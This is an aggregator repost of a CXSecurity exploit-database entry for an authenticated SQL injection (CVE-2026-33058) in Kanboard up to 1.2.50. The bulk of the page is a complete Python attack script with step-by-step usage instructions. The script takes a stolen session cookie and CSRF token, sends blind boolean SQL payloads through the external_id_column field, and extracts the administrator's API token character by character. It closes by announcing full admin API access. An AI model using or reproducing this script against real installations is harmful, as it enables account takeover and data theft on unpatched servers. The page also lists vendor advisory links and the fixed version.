惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

B
Blog RSS Feed
C
CERT Recently Published Vulnerability Notes
P
Proofpoint News Feed
Y
Y Combinator Blog
T
The Blog of Author Tim Ferriss
云风的 BLOG
云风的 BLOG
H
Help Net Security
Recorded Future
Recorded Future
The Register - Security
The Register - Security
F
Full Disclosure
N
Netflix TechBlog - Medium
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
酷 壳 – CoolShell
酷 壳 – CoolShell
H
Hackread – Cybersecurity News, Data Breaches, AI and More
爱范儿
爱范儿
Security Archives - TechRepublic
Security Archives - TechRepublic
Simon Willison's Weblog
Simon Willison's Weblog
Cisco Talos Blog
Cisco Talos Blog
I
InfoQ
T
Tenable Blog
T
Tor Project blog
人人都是产品经理
人人都是产品经理
D
DataBreaches.Net
NISL@THU
NISL@THU
Google DeepMind News
Google DeepMind News
博客园 - 叶小钗
B
Blog
V
V2EX
Jina AI
Jina AI
L
LangChain Blog
月光博客
月光博客
W
WeLiveSecurity
U
Unit 42
AWS News Blog
AWS News Blog
C
Cyber Attacks, Cyber Crime and Cyber Security
博客园 - 聂微东
V
Visual Studio Blog
A
Arctic Wolf
T
Tailwind CSS Blog
The Cloudflare Blog
SecWiki News
SecWiki News
S
SegmentFault 最新的问题
Hacker News - Newest:
Hacker News - Newest: "LLM"
宝玉的分享
宝玉的分享
MyScale Blog
MyScale Blog
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
S
Securelist
www.infosecurity-magazine.com
www.infosecurity-magazine.com
腾讯CDC
雷峰网
雷峰网

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
Kanboard <= 1.2.50 Authenticated SQL Injection
2026-03-18 · via The Exploit Database - CXSecurity.com

Kanboard <= 1.2.50 Authenticated SQL Injection

#!/usr/bin/env python3 # Exploit Title: Kanboard Authenticated SQL Injection in ProjectPermissionController # CVE: CVE-2026-33058 # Date: 2026-03-18 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://kanboard.org # Software Link: https://github.com/kanboard/kanboard # Affected: Kanboard <= 1.2.50 # Tested on: Kanboard 1.2.50 (SQLite) # Category: Webapps # Platform: PHP # Exploit Type: Remote # CVSS: 8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H # Description: Authenticated SQL injection via external_id_column parameter when adding a user to a project. # Allows extraction of sensitive data (API tokens, password hashes, emails, etc.) # Fixed in: 1.2.51 # Usage: # python3 exploit.py <base_url> <project_id> <KB_SID> <csrf_token> # # Examples: # python3 exploit.py http://kanboard.local 1 abc123xyz CSRF-abcdef1234567890 # # Options: # -- # # Notes: # • Requires valid authenticated session and CSRF token # • Targets admin API token by default (blind boolean-based) # • Adjust success condition in send_injection() if needed # # How to Use # # Step 1: Log in to Kanboard with an account that has permission to add users to a project # # Step 2: Open browser dev tools → Network tab → go to project permissions page → copy: # • KB_SID cookie value # • csrf_token value from the form (or from any POST request) # # Step 3: Run the script with the collected values # import sys import requests import string import time BASE_URL = sys.argv[1].rstrip('/') PROJECT_ID = sys.argv[2] KB_SID = sys.argv[3] CSRF_TOKEN = sys.argv[4] COOKIES = { "KB_SID": KB_SID, } HEADERS = { "Content-Type": "application/x-www-form-urlencoded", "Referer": f"{BASE_URL}/project/{PROJECT_ID}/permissions" } def send_injection(payload): data = { "csrf_token": CSRF_TOKEN, "user_id": "", "username": "testinj", "external_id": "dummy", "external_id_column": payload, "name": "Test Injection", "role": "project-member" } r = requests.post( f"{BASE_URL}/?controller=ProjectPermissionController&action=addUser&project_id={PROJECT_ID}", data=data, cookies=COOKIES, headers=HEADERS, allow_redirects=False ) return "error" not in r.text.lower() and r.status_code == 302 def bool_query(condition): payload = f"id) OR (SELECT CASE WHEN ({condition}) THEN 1 ELSE (SELECT 1 WHERE 0) END FROM users WHERE role='app-admin' LIMIT 1) -- " return send_injection(payload) def extract_admin_api_token(): token = "" charset = string.ascii_letters + string.digits + "-_" print("[*] Extracting admin API token (blind boolean)...") for pos in range(1, 41): found = False for c in charset: condition = f"substr((SELECT api_access_token FROM users WHERE role='app-admin' LIMIT 1),{pos},1)='{c}'" if bool_query(condition): token += c print(f"[+] Position {pos}: {c} → {token}") found = True break time.sleep(0.3) if not found: print(f"[+] Token extraction finished: {token}") break return token if __name__ == "__main__": if len(sys.argv) != 5: print("Usage: python3 exploit.py <base_url> <project_id> <KB_SID> <csrf_token>") sys.exit(1) extracted = extract_admin_api_token() if extracted: print(f"\n[!] Extracted admin API token: {extracted}") print("You can now use this token for full API access as admin.")

References:

Official advisory:

https://github.com/kanboard/kanboard/security/advisories/GHSA-f62r-m4mr-2xhh

Vendor homepage:

https://kanboard.org

Software repository:

https://github.com/kanboard/kanboard




 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


Copyright 2026, cxsecurity.com

Back to Top